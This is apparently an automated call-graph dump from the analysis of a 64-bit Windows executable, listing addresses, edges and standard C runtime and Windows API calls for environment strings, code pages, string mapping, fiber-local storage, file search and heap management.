7ff6d6eb425c 20138->20139 20138->20140 20142 7ff6d6ea5cb4 _set_fmode 11 API calls 20139->20142 20141 7ff6d6eb4275 20140->20141 20482 7ff6d6eb8ce8 20140->20482 20489 7ff6d6eb13ac 20141->20489 20145 7ff6d6eb4261 __scrt_get_show_window_mode 20142->20145 20145->19991 20147 7ff6d6ea5788 45 API calls 20146->20147 20148 7ff6d6eb835a 20147->20148 20149 7ff6d6eb8368 20148->20149 20150 7ff6d6eafbd4 5 API calls 20148->20150 20151 7ff6d6ea5d74 14 API calls 20149->20151 20150->20149 20152 7ff6d6eb83c4 20151->20152 20153 7ff6d6eb8454 20152->20153 20154 7ff6d6ea5788 45 API calls 20152->20154 20155 7ff6d6eb8465 20153->20155 20157 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20153->20157 20156 7ff6d6eb83d7 20154->20156 20158 7ff6d6eb19fb 20155->20158 20160 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20155->20160 20159 7ff6d6eafbd4 5 API calls 20156->20159 20161 7ff6d6eb83e0 20156->20161 20157->20155 20158->20010 20158->20011 20159->20161 20160->20158 20162 7ff6d6ea5d74 14 API calls 20161->20162 20163 7ff6d6eb843b 20162->20163 20163->20153 20164 7ff6d6eb8443 SetEnvironmentVariableW 20163->20164 20164->20153 20166 7ff6d6eb1f04 20165->20166 20173 7ff6d6eb1ee7 20165->20173 20167 7ff6d6eaf948 _set_fmode 11 API calls 20166->20167 20168 7ff6d6eb1f28 20167->20168 20169 7ff6d6eb1f89 20168->20169 20174 7ff6d6eaf948 _set_fmode 11 API calls 20168->20174 20175 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20168->20175 20176 7ff6d6eb1344 _wfindfirst32i64 37 API calls 20168->20176 20177 7ff6d6eb1f98 20168->20177 20179 7ff6d6eb1fac 20168->20179 20172 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20169->20172 20170 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20171 7ff6d6eb1fb2 20170->20171 20172->20173 20173->20023 20174->20168 20175->20168 20176->20168 20178 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20177->20178 20178->20179 20179->20170 20181 7ff6d6eaa4c0 20180->20181 20184 7ff6d6eaa4c9 20180->20184 20181->20184 20501 7ff6d6ea9fc0 20181->20501 20184->20038 20184->20039 20187 7ff6d6eb80a9 20186->20187 20191 7ff6d6eb80d6 20186->20191 20188 7ff6d6eb80ae 20187->20188 20187->20191 20189 7ff6d6ea5cb4 _set_fmode 11 API calls 20188->20189 20190 7ff6d6eb80b3 20189->20190 20193 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20190->20193 20192 7ff6d6eb811a 20191->20192 20194 7ff6d6eb8139 20191->20194 20206 7ff6d6eb810e __crtLCMapStringW 20191->20206 20195 7ff6d6ea5cb4 _set_fmode 11 API calls 20192->20195 20196 7ff6d6eb80be 20193->20196 20197 7ff6d6eb8155 20194->20197 20198 7ff6d6eb8143 20194->20198 20199 7ff6d6eb811f 20195->20199 20196->20036 20201 7ff6d6ea5788 45 API calls 20197->20201 20200 7ff6d6ea5cb4 _set_fmode 11 API calls 20198->20200 20202 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20199->20202 20203 7ff6d6eb8148 20200->20203 20204 7ff6d6eb8162 20201->20204 20202->20206 20205 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20203->20205 20204->20206 20548 7ff6d6eb9bc0 20204->20548 20205->20206 20206->20036 20209 7ff6d6ea5cb4 _set_fmode 11 API calls 20209->20206 20211 7ff6d6ea9f65 20210->20211 20212 7ff6d6ea9f61 20210->20212 20233 7ff6d6eb3440 20211->20233 20212->20097 20225 7ff6d6eaa2a0 20212->20225 20217 7ff6d6ea9f83 20259 7ff6d6eaa030 20217->20259 20218 7ff6d6ea9f77 20219 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20218->20219 20219->20212 20222 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20223 7ff6d6ea9faa 20222->20223 20224 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20223->20224 20224->20212 20226 7ff6d6eaa2c9 20225->20226 20229 7ff6d6eaa2e2 20225->20229 20226->20097 20227 7ff6d6eb1640 WideCharToMultiByte 20227->20229 20228 7ff6d6eaf948 _set_fmode 11 API calls 20228->20229 20229->20226 20229->20227 20229->20228 20230 7ff6d6eaa372 20229->20230 20232 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20229->20232 20231 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20230->20231 20231->20226 20232->20229 20234 7ff6d6ea9f6a 20233->20234 20235 7ff6d6eb344d 20233->20235 20239 7ff6d6eb377c GetEnvironmentStringsW 20234->20239 20278 7ff6d6eabfd4 20235->20278 20240 7ff6d6ea9f6f 20239->20240 20241 7ff6d6eb37ac 20239->20241 20240->20217 20240->20218 20242 7ff6d6eb1640 WideCharToMultiByte 20241->20242 20243 7ff6d6eb37fd 20242->20243 20244 7ff6d6eb3804 FreeEnvironmentStringsW 20243->20244 20245 7ff6d6eae3ac _fread_nolock 12 API calls 20243->20245 20244->20240 20246 7ff6d6eb3817 20245->20246 20247 7ff6d6eb381f 20246->20247 20248 7ff6d6eb3828 20246->20248 20249 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20247->20249 20250 7ff6d6eb1640 WideCharToMultiByte 20248->20250 20251 7ff6d6eb3826 20249->20251 20252 7ff6d6eb384b 20250->20252 20251->20244 20253 7ff6d6eb384f 20252->20253 20254 7ff6d6eb3859 20252->20254 20256 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20253->20256 20255 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20254->20255 20257 7ff6d6eb3857 FreeEnvironmentStringsW 20255->20257 20256->20257 20257->20240 20260 7ff6d6eaa055 20259->20260 20261 7ff6d6eaf948 _set_fmode 11 API calls 20260->20261 20272 7ff6d6eaa08b 20261->20272 20262 7ff6d6eaa093 20263 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20262->20263 20264 7ff6d6ea9f8b 20263->20264 20264->20222 20265 7ff6d6eaa106 20266 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20265->20266 20266->20264 20267 7ff6d6eaf948 _set_fmode 11 API calls 20267->20272 20268 7ff6d6eaa0f5 20427 7ff6d6eaa25c 20268->20427 20269 7ff6d6eab25c __std_exception_copy 37 API calls 20269->20272 20272->20262 20272->20265 20272->20267 20272->20268 20272->20269 20273 7ff6d6eaa12b 20272->20273 20276 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20272->20276 20275 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20273->20275 20274 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20274->20262 20277 7ff6d6eaa13e 20275->20277 20276->20272 20279 7ff6d6eac000 FlsSetValue 20278->20279 20280 7ff6d6eabfe5 FlsGetValue 20278->20280 20281 7ff6d6eabff2 20279->20281 20283 7ff6d6eac00d 20279->20283 20280->20281 20282 7ff6d6eabffa 20280->20282 20285 7ff6d6eabff8 20281->20285 20286 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20281->20286 20282->20279 20284 7ff6d6eaf948 _set_fmode 11 API calls 20283->20284 20287 7ff6d6eac01c 20284->20287 20298 7ff6d6eb3114 20285->20298 20288 7ff6d6eac075 20286->20288 20289 7ff6d6eac03a FlsSetValue 20287->20289 20290 7ff6d6eac02a FlsSetValue 20287->20290 20292 7ff6d6eac058 20289->20292 20293 7ff6d6eac046 FlsSetValue 20289->20293 20291 7ff6d6eac033 20290->20291 20294 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20291->20294 20295 7ff6d6eabcac _set_fmode 11 API calls 20292->20295 20293->20291 20294->20281 20296 7ff6d6eac060 20295->20296 20297 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20296->20297 20297->20285 20321 7ff6d6eb3384 20298->20321 20300 7ff6d6eb3149 20336 7ff6d6eb2e14 20300->20336 20303 7ff6d6eb3166 20303->20234 20304 7ff6d6eae3ac _fread_nolock 12 API calls 20305 7ff6d6eb3177 20304->20305 20306 7ff6d6eb317f 20305->20306 20308 7ff6d6eb318e 20305->20308 20307 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20306->20307 20307->20303 20308->20308 20343 7ff6d6eb34bc 20308->20343 20311 7ff6d6eb328a 20312 7ff6d6ea5cb4 _set_fmode 11 API calls 20311->20312 20313 7ff6d6eb328f 20312->20313 20316 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20313->20316 20314 7ff6d6eb32e5 20315 7ff6d6eb334c 20314->20315 20354 7ff6d6eb2c44 20314->20354 20320 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20315->20320 20316->20303 20317 7ff6d6eb32a4 20317->20314 20318 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20317->20318 20318->20314 20320->20303 20322 7ff6d6eb33a7 20321->20322 20323 7ff6d6eb33b1 20322->20323 20369 7ff6d6eb11a8 EnterCriticalSection 20322->20369 20325 7ff6d6eb3423 20323->20325 20328 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20323->20328 20325->20300 20330 7ff6d6eb343b 20328->20330 20332 7ff6d6eabfd4 50 API calls 20330->20332 20335 7ff6d6eb3492 20330->20335 20333 7ff6d6eb347c 20332->20333 20334 7ff6d6eb3114 65 API calls 20333->20334 20334->20335 20335->20300 20337 7ff6d6ea5788 45 API calls 20336->20337 20338 7ff6d6eb2e28 20337->20338 20339 7ff6d6eb2e34 GetOEMCP 20338->20339 20340 7ff6d6eb2e46 20338->20340 20341 7ff6d6eb2e5b 20339->20341 20340->20341 20342 7ff6d6eb2e4b GetACP 20340->20342 20341->20303 20341->20304 20342->20341 20344 7ff6d6eb2e14 47 API calls 20343->20344 20346 7ff6d6eb34e9 20344->20346 20345 7ff6d6eb363f 20347 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20345->20347 20346->20345 20348 7ff6d6eb3526 IsValidCodePage 20346->20348 20353 7ff6d6eb3540 __scrt_get_show_window_mode 20346->20353 20349 7ff6d6eb3281 20347->20349 20348->20345 20350 7ff6d6eb3537 20348->20350 20349->20311 20349->20317 20351 7ff6d6eb3566 GetCPInfo 20350->20351 20350->20353 20351->20345 20351->20353 20370 7ff6d6eb2f2c 20353->20370 20426 7ff6d6eb11a8 EnterCriticalSection 20354->20426 20371 7ff6d6eb2f69 GetCPInfo 20370->20371 20372 7ff6d6eb305f 20370->20372 20371->20372 20377 7ff6d6eb2f7c 20371->20377 20373 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20372->20373 20374 7ff6d6eb30fe 20373->20374 20374->20345 20375 7ff6d6eb3c90 48 API calls 20376 7ff6d6eb2ff3 20375->20376 20381 7ff6d6eb8c34 20376->20381 20377->20375 20380 7ff6d6eb8c34 54 API calls 20380->20372 20382 7ff6d6ea5788 45 API calls 20381->20382 20383 7ff6d6eb8c59 20382->20383 20386 7ff6d6eb8900 20383->20386 20387 7ff6d6eb8941 20386->20387 20388 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20387->20388 20392 7ff6d6eb898b 20388->20392 20389 7ff6d6eb8c09 20391 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20389->20391 20390 7ff6d6eb8ac1 20390->20389 20395 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20390->20395 20393 7ff6d6eb3026 20391->20393 20392->20389 20392->20390 20394 7ff6d6eae3ac _fread_nolock 12 API calls 20392->20394 20396 7ff6d6eb89c3 20392->20396 20393->20380 20394->20396 20395->20389 20396->20390 20397 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20396->20397 20398 7ff6d6eb8a36 20397->20398 20398->20390 20417 7ff6d6eafd94 20398->20417 20401 7ff6d6eb8a81 20401->20390 20404 7ff6d6eafd94 __crtLCMapStringW 6 API calls 20401->20404 20402 7ff6d6eb8ad2 20403 7ff6d6eae3ac _fread_nolock 12 API calls 20402->20403 20405 7ff6d6eb8ba4 20402->20405 20407 7ff6d6eb8af0 20402->20407 20403->20407 20404->20390 20405->20390 20406 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20405->20406 20406->20390 20407->20390 20408 7ff6d6eafd94 __crtLCMapStringW 6 API calls 20407->20408 20409 7ff6d6eb8b70 20408->20409 20409->20405 20410 7ff6d6eb8b90 20409->20410 20411 7ff6d6eb8ba6 20409->20411 20412 7ff6d6eb1640 WideCharToMultiByte 20410->20412 20413 7ff6d6eb1640 WideCharToMultiByte 20411->20413 20414 7ff6d6eb8b9e 20412->20414 20413->20414 20414->20405 20415 7ff6d6eb8bbe 20414->20415 20415->20390 20416 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20415->20416 20416->20390 20418 7ff6d6eaf9c0 __crtLCMapStringW 5 API calls 20417->20418 20419 7ff6d6eafdd2 20418->20419 20422 7ff6d6eafdda 20419->20422 20423 7ff6d6eafe80 20419->20423 20421 7ff6d6eafe43 LCMapStringW 20421->20422 20422->20390 20422->20401 20422->20402 20424 7ff6d6eaf9c0 __crtLCMapStringW 5 API calls 20423->20424 20425 7ff6d6eafeae __crtLCMapStringW 20424->20425 20425->20421 20428 7ff6d6eaa0fd 20427->20428 20429 7ff6d6eaa261 20427->20429 20428->20274 20430 7ff6d6eaa28a 20429->20430 20432 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20429->20432 20431 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20430->20431 20431->20428 20432->20429 20434 7ff6d6eb7410 20433->20434 20435 7ff6d6eb73f9 20433->20435 20434->20435 20437 7ff6d6eb741e 20434->20437 20436 7ff6d6ea5cb4 _set_fmode 11 API calls 20435->20436 20438 7ff6d6eb73fe 20436->20438 20440 7ff6d6ea5788 45 API calls 20437->20440 20441 7ff6d6eb7409 20437->20441 20439 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20438->20439 20439->20441 20440->20441 20441->20109 20443 7ff6d6ea5788 45 API calls 20442->20443 20444 7ff6d6eba029 20443->20444 20447 7ff6d6eb9c80 20444->20447 20449 7ff6d6eb9cce 20447->20449 20448 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20450 7ff6d6eb82b5 20448->20450 20452 7ff6d6eb9d40 GetCPInfo 20449->20452 20453 7ff6d6eb9d55 20449->20453 20454 7ff6d6eb9d59 20449->20454 20450->20109 20450->20136 20451 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20455 7ff6d6eb9ded 20451->20455 20452->20453 20452->20454 20453->20451 20453->20454 20454->20448 20455->20454 20456 7ff6d6eae3ac _fread_nolock 12 API calls 20455->20456 20457 7ff6d6eb9e24 20455->20457 20456->20457 20457->20454 20458 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20457->20458 20459 7ff6d6eb9e92 20458->20459 20460 7ff6d6eb9f74 20459->20460 20461 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20459->20461 20460->20454 20462 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20460->20462 20463 7ff6d6eb9eb8 20461->20463 20462->20454 20463->20460 20464 7ff6d6eae3ac _fread_nolock 12 API calls 20463->20464 20465 7ff6d6eb9ee5 20463->20465 20464->20465 20465->20460 20466 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20465->20466 20467 7ff6d6eb9f5c 20466->20467 20468 7ff6d6eb9f62 20467->20468 20469 7ff6d6eb9f7c 20467->20469 20468->20460 20471 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20468->20471 20476 7ff6d6eafc18 20469->20476 20471->20460 20473 7ff6d6eb9fbb 20473->20454 20475 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20473->20475 20474 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20474->20473 20475->20454 20477 7ff6d6eaf9c0 __crtLCMapStringW 5 API calls 20476->20477 20478 7ff6d6eafc56 20477->20478 20479 7ff6d6eafc5e 20478->20479 20480 7ff6d6eafe80 __crtLCMapStringW 5 API calls 20478->20480 20479->20473 20479->20474 20481 7ff6d6eafcc7 CompareStringW 20480->20481 20481->20479 20483 7ff6d6eb8cf1 20482->20483 20484 7ff6d6eb8d0a HeapSize 20482->20484 20485 7ff6d6ea5cb4 _set_fmode 11 API calls 20483->20485 20486 7ff6d6eb8cf6 20485->20486 20487 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20486->20487 20488 7ff6d6eb8d01 20487->20488 20488->20141 20490 7ff6d6eb13c1 20489->20490 20491 7ff6d6eb13cb 20489->20491 20492 7ff6d6eae3ac _fread_nolock 12 API calls 20490->20492 20493 7ff6d6eb13d0 20491->20493 20499 7ff6d6eb13d7 _set_fmode 20491->20499 20497 7ff6d6eb13c9 20492->20497 20494 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20493->20494 20494->20497 20495 7ff6d6eb13dd 20498 7ff6d6ea5cb4 _set_fmode 11 API calls 20495->20498 20496 7ff6d6eb140a HeapReAlloc 20496->20497 20496->20499 20497->20145 20498->20497 20499->20495 20499->20496 20500 7ff6d6eb43e0 _set_fmode 2 API calls 20499->20500 20500->20499 20502 7ff6d6ea9fd5 20501->20502 20503 7ff6d6ea9fd9 20501->20503 20502->20184 20514 7ff6d6eaa380 20502->20514 20522 7ff6d6eb388c GetEnvironmentStringsW 20503->20522 20506 7ff6d6ea9ff2 20529 7ff6d6eaa140 20506->20529 20507 7ff6d6ea9fe6 20508 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20507->20508 20508->20502 20511 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20512 7ff6d6eaa019 20511->20512 20513 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20512->20513 20513->20502 20515 7ff6d6eaa3a3 20514->20515 20520 7ff6d6eaa3ba 20514->20520 20515->20184 20516 7ff6d6eaf948 _set_fmode 11 API calls 20516->20520 20517 7ff6d6eaa42e 20519 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20517->20519 20518 7ff6d6eb03f0 MultiByteToWideChar _fread_nolock 20518->20520 20519->20515 20520->20515 20520->20516 20520->20517 20520->20518 20521 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20520->20521 20521->20520 20523 7ff6d6eb38b0 20522->20523 20524 7ff6d6ea9fde 20522->20524 20525 7ff6d6eae3ac _fread_nolock 12 API calls 20523->20525 20524->20506 20524->20507 20526 7ff6d6eb38e7 memcpy_s 20525->20526 20527 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20526->20527 20528 7ff6d6eb3907 FreeEnvironmentStringsW 20527->20528 20528->20524 20530 7ff6d6eaa168 20529->20530 20531 7ff6d6eaf948 _set_fmode 11 API calls 20530->20531 20542 7ff6d6eaa1a3 20531->20542 20532 7ff6d6eaa1ab 20533 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20532->20533 20534 7ff6d6ea9ffa 20533->20534 20534->20511 20535 7ff6d6eaa225 20536 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20535->20536 20536->20534 20537 7ff6d6eaf948 _set_fmode 11 API calls 20537->20542 20538 7ff6d6eaa214 20540 7ff6d6eaa25c 11 API calls 20538->20540 20539 7ff6d6eb1344 _wfindfirst32i64 37 API calls 20539->20542 20541 7ff6d6eaa21c 20540->20541 20544 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20541->20544 20542->20532 20542->20535 20542->20537 20542->20538 20542->20539 20543 7ff6d6eaa248 20542->20543 20546 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20542->20546 20545 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20543->20545 20544->20532 20547 7ff6d6eaa25a 20545->20547 20546->20542 20549 7ff6d6eb9be9 __crtLCMapStringW 20548->20549 20550 7ff6d6eb819e 20549->20550 20551 7ff6d6eafc18 6 API calls 20549->20551 20550->20206 20550->20209 20551->20550 19823 7ff6d6e99d9b 19825 7ff6d6e99da1 19823->19825 19824 7ff6d6e9b850 12 API calls 19826 7ff6d6e9a656 19824->19826 19825->19824 19825->19826 20902 7ff6d6ebbc8e 20903 7ff6d6ebbc9e 20902->20903 20906 7ff6d6ea5b68 LeaveCriticalSection 20903->20906 16326 7ff6d6eaa715 16338 7ff6d6eab188 16326->16338 16343 7ff6d6eabf00 GetLastError 16338->16343 16344 7ff6d6eabf41 FlsSetValue 16343->16344 16345 7ff6d6eabf24 FlsGetValue 16343->16345 16347 7ff6d6eabf53 16344->16347 16362 7ff6d6eabf31 16344->16362 16346 7ff6d6eabf3b 16345->16346 16345->16362 16346->16344 16349 7ff6d6eaf948 _set_fmode 11 API calls 16347->16349 16348 7ff6d6eabfad SetLastError 16350 7ff6d6eabfcd 16348->16350 16351 7ff6d6eab191 16348->16351 16352 7ff6d6eabf62 16349->16352 16353 7ff6d6eab2bc _CreateFrameInfo 38 API calls 16350->16353 16365 7ff6d6eab2bc 16351->16365 16354 7ff6d6eabf80 FlsSetValue 16352->16354 16355 7ff6d6eabf70 FlsSetValue 16352->16355 16356 7ff6d6eabfd2 16353->16356 16358 7ff6d6eabf9e 16354->16358 16359 7ff6d6eabf8c FlsSetValue 16354->16359 16357 7ff6d6eabf79 16355->16357 16360 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16357->16360 16361 7ff6d6eabcac _set_fmode 11 API calls 16358->16361 16359->16357 16360->16362 16363 7ff6d6eabfa6 16361->16363 16362->16348 16364 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16363->16364 16364->16348 16374 7ff6d6eb44a0 16365->16374 16400 7ff6d6eb4458 16374->16400 16405 7ff6d6eb11a8 EnterCriticalSection 16400->16405 19441 7ff6d6ebbe14 19444 7ff6d6ea5b68 LeaveCriticalSection 19441->19444 19827 7ff6d6eabd80 19828 7ff6d6eabd9a 19827->19828 19829 7ff6d6eabd85 19827->19829 19833 7ff6d6eabda0 19829->19833 19834 7ff6d6eabdea 19833->19834 19835 7ff6d6eabde2 19833->19835 19837 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19834->19837 19836 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19835->19836 19836->19834 19838 7ff6d6eabdf7 19837->19838 19839 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19838->19839 19840 7ff6d6eabe04 19839->19840 19841 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19840->19841 19842 7ff6d6eabe11 19841->19842 19843 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19842->19843 19844 7ff6d6eabe1e 19843->19844 19845 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19844->19845 19846 7ff6d6eabe2b 19845->19846 19847 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19846->19847 19848 7ff6d6eabe38 19847->19848 19849 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19848->19849 19850 7ff6d6eabe45 19849->19850 19851 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19850->19851 19852 7ff6d6eabe55 19851->19852 19853 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19852->19853 19854 7ff6d6eabe65 19853->19854 19859 7ff6d6eabc4c 19854->19859 19873 7ff6d6eb11a8 EnterCriticalSection 19859->19873 20587 7ff6d6eb2500 20598 7ff6d6eb8494 20587->20598 20599 7ff6d6eb84a1 20598->20599 20600 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20599->20600 20601 7ff6d6eb84bd 20599->20601 20600->20599 20602 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20601->20602 20603 7ff6d6eb2509 20601->20603 20602->20601 20604 7ff6d6eb11a8 EnterCriticalSection 20603->20604 20605 7ff6d6eaab00 20608 7ff6d6eaaa80 20605->20608 20615 7ff6d6eb11a8 EnterCriticalSection 20608->20615 20616 7ff6d6ea5b00 20617 7ff6d6ea5b0b 20616->20617 20625 7ff6d6eaff54 20617->20625 20638 7ff6d6eb11a8 EnterCriticalSection 20625->20638 16123 7ff6d6ea8670 16124 7ff6d6ea869e 16123->16124 16125 7ff6d6ea86d7 16123->16125 16203 7ff6d6ea5cb4 16124->16203 16125->16124 16127 7ff6d6ea86dc FindFirstFileExW 16125->16127 16129 7ff6d6ea86fe GetLastError 16127->16129 16130 7ff6d6ea8745 16127->16130 16133 7ff6d6ea8735 16129->16133 16134 7ff6d6ea8709 16129->16134 16183 7ff6d6ea88e0 16130->16183 16136 7ff6d6ea5cb4 _set_fmode 11 API calls 16133->16136 16134->16133 16138 7ff6d6ea8725 16134->16138 16139 7ff6d6ea8713 16134->16139 16135 7ff6d6ea86ae 16208 7ff6d6e9c010 16135->16208 16136->16135 16142 7ff6d6ea5cb4 _set_fmode 11 API calls 16138->16142 16139->16133 16141 7ff6d6ea8718 16139->16141 16140 7ff6d6ea88e0 _wfindfirst32i64 10 API calls 16144 7ff6d6ea876b 16140->16144 16145 7ff6d6ea5cb4 _set_fmode 11 API calls 16141->16145 16142->16135 16147 7ff6d6ea88e0 _wfindfirst32i64 10 API calls 16144->16147 16145->16135 16148 7ff6d6ea8779 16147->16148 16190 7ff6d6eb1344 16148->16190 16151 7ff6d6ea87a3 16199 7ff6d6eab6b8 IsProcessorFeaturePresent 16151->16199 16184 7ff6d6ea88fe FileTimeToSystemTime 16183->16184 16185 7ff6d6ea88f8 16183->16185 16186 7ff6d6ea890d SystemTimeToTzSpecificLocalTime 16184->16186 16187 7ff6d6ea8923 16184->16187 16185->16184 16185->16187 16186->16187 16188 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16187->16188 16189 7ff6d6ea875d 16188->16189 16189->16140 16191 7ff6d6eb1351 16190->16191 16192 7ff6d6eb135b 16190->16192 16191->16192 16197 7ff6d6eb1377 16191->16197 16193 7ff6d6ea5cb4 _set_fmode 11 API calls 16192->16193 16194 7ff6d6eb1363 16193->16194 16195 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 16194->16195 16196 7ff6d6ea8797 16195->16196 16196->16135 16196->16151 16197->16196 16198 7ff6d6ea5cb4 _set_fmode 11 API calls 16197->16198 16198->16194 16200 7ff6d6eab6cb 16199->16200 16217 7ff6d6eab3cc 16200->16217 16225 7ff6d6eac078 GetLastError 16203->16225 16205 7ff6d6ea5cbd 16206 7ff6d6eab698 16205->16206 16283 7ff6d6eab530 16206->16283 16209 7ff6d6e9c019 16208->16209 16210 7ff6d6e9c024 16209->16210 16211 7ff6d6e9c070 IsProcessorFeaturePresent 16209->16211 16212 7ff6d6e9c088 16211->16212 16321 7ff6d6e9c264 RtlCaptureContext 16212->16321 16218 7ff6d6eab406 _wfindfirst32i64 __scrt_get_show_window_mode 16217->16218 16219 7ff6d6eab42e RtlCaptureContext RtlLookupFunctionEntry 16218->16219 16220 7ff6d6eab49e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16219->16220 16221 7ff6d6eab468 RtlVirtualUnwind 16219->16221 16222 7ff6d6eab4f0 _wfindfirst32i64 16220->16222 16221->16220 16223 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16222->16223 16224 7ff6d6eab50f GetCurrentProcess TerminateProcess 16223->16224 16226 7ff6d6eac0b9 FlsSetValue 16225->16226 16232 7ff6d6eac09c 16225->16232 16227 7ff6d6eac0a9 SetLastError 16226->16227 16228 7ff6d6eac0cb 16226->16228 16227->16205 16242 7ff6d6eaf948 16228->16242 16232->16226 16232->16227 16233 7ff6d6eac0f8 FlsSetValue 16236 7ff6d6eac104 FlsSetValue 16233->16236 16237 7ff6d6eac116 16233->16237 16234 7ff6d6eac0e8 FlsSetValue 16235 7ff6d6eac0f1 16234->16235 16249 7ff6d6eab700 16235->16249 16236->16235 16255 7ff6d6eabcac 16237->16255 16247 7ff6d6eaf959 _set_fmode 16242->16247 16243 7ff6d6eaf9aa 16246 7ff6d6ea5cb4 _set_fmode 10 API calls 16243->16246 16244 7ff6d6eaf98e RtlAllocateHeap 16245 7ff6d6eac0da 16244->16245 16244->16247 16245->16233 16245->16234 16246->16245 16247->16243 16247->16244 16260 7ff6d6eb43e0 16247->16260 16250 7ff6d6eab705 RtlRestoreThreadPreferredUILanguages 16249->16250 16251 7ff6d6eab734 16249->16251 16250->16251 16252 7ff6d6eab720 GetLastError 16250->16252 16251->16227 16253 7ff6d6eab72d Concurrency::details::SchedulerProxy::DeleteThis 16252->16253 16254 7ff6d6ea5cb4 _set_fmode 9 API calls 16253->16254 16254->16251 16269 7ff6d6eabb84 16255->16269 16263 7ff6d6eb4420 16260->16263 16268 7ff6d6eb11a8 EnterCriticalSection 16263->16268 16281 7ff6d6eb11a8 